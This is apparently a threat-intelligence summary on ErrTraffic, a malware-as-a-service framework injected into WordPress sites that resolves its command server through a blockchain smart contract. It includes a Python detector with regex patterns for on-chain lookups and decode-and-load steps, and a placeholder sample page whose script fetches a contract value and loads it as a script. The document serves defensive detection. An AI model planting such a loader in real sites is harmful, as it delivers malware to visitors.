EXECUTIVE SUMMARY:
A North Korean threat group has been targeting financial institutions. The attackers use a malicious JavaScript framework called ErrTraffic, which is injected into compromised WordPress sites to display the ClickFix lure and subsequently deliver malware to visitors. This framework is sold as a Malware-as-a-Service accompanied by a malicious WordPress plugin that facilitates deployment and an administration panel for managing payloads, statistics, geolocation-based filtering, and other features. ErrTraffic's operator also sells the source code "as-is." The injected script on compromised WordPress sites queries a smart contract on a blockchain to retrieve the ErrTraffic C2 server.
This mechanism allows the attackers to rotate infrastructure without redeploying code across thousands of compromised sites, and it helps evade blocking by security solutions because the C2 address stored on-chain can be updated regularly. Since its first version, ErrTraffic has gone through several iterations. ErrTraffic v3 uses the EtherHiding technique as a dead drop resolver. The threat actor operating under the handle LenAI has advertised and sold the ErrTraffic framework under a MaaS model on a cybercrime forum and on Telegram.
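The on-chain dead drop described above leaves a footprint in the page source: an inline script that issues a contract-read call over JSON-RPC and then decodes and loads whatever comes back. The following Python example is added here for illustration (it is neither Sekoia's code nor ErrTraffic's) and scores inline scripts on those signals; the sample pages, RPC host and contract address are constructed placeholders, not indicators from any real campaign.

```python
import re
from html.parser import HTMLParser

# Weak signals that together resemble an on-chain dead drop lookup:
# a contract-state read over JSON-RPC, a 20-byte contract address, and
# a decode-then-load step. Each alone is common in legitimate dApps.
RPC_READ = re.compile(r'["\'](eth_call|eth_getStorageAt)["\']')
CONTRACT_ADDR = re.compile(r'0x[0-9a-fA-F]{40}\b')
DECODE_LOAD = re.compile(r'\b(atob|eval|Function)\s*\(|createElement\(\s*["\']script')

class InlineScriptCollector(HTMLParser):
    """Collects the body of every inline <script> (tags without src)."""
    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []
    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def score_script(js):
    """2 for the RPC read, 1 for an address, 1 for decode-and-load (max 4)."""
    return (2 * bool(RPC_READ.search(js)) + bool(CONTRACT_ADDR.search(js))
            + bool(DECODE_LOAD.search(js)))

def find_suspicious_scripts(html, threshold=3):
    """Inline scripts whose combined score reaches the threshold (heuristic)."""
    parser = InlineScriptCollector()
    parser.feed(html)
    return [s for s in parser.scripts if score_script(s) >= threshold]

# Constructed sample pages. The RPC host and the all-zero contract
# address are placeholders, not indicators from any real campaign.
BENIGN_PAGE = """<html><body><script>window.dataLayer = window.dataLayer || [];
dataLayer.push({page: "home"});</script></body></html>"""
DEAD_DROP_PAGE = """<html><body><script src="/wp-includes/js/jquery.js"></script>
<script>fetch("https://rpc.example.invalid", {method: "POST", body: JSON.stringify({
  jsonrpc: "2.0", id: 1, method: "eth_call", params: [{to:
  "0x0000000000000000000000000000000000000000", data: "0x"}, "latest"]})})
  .then(r => r.json()).then(j => { var s = document.createElement("script");
  s.src = atob(j.result); document.head.appendChild(s); });</script></body></html>"""
```

Run `find_suspicious_scripts` over the rendered HTML of each WordPress page (or the theme and plugin files themselves) to surface injected resolvers; scripts loaded via `src` need a second pass on the fetched file.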
LenAI's pricing model evolved during the first half of, with monthly subscription fees rising from $300 to $380, and the price of the source code doubling from $1,500 in January to $3,000 in April. The subscription model includes a limited number of rental spots, which restricts access to a select group of clients and operates on a queue basis. This shift underscores a lucrative and efficient cybercrime business model, as well as the framework's successful establishment within the traffic distribution ecosystem.
THREAT PROFILE:
REFERENCES:
The following reports contain further technical details:
https://www.sekoia.com/blog/unveiling-errtraffic-inside-a-growing-clickfix-malware-distribution-framework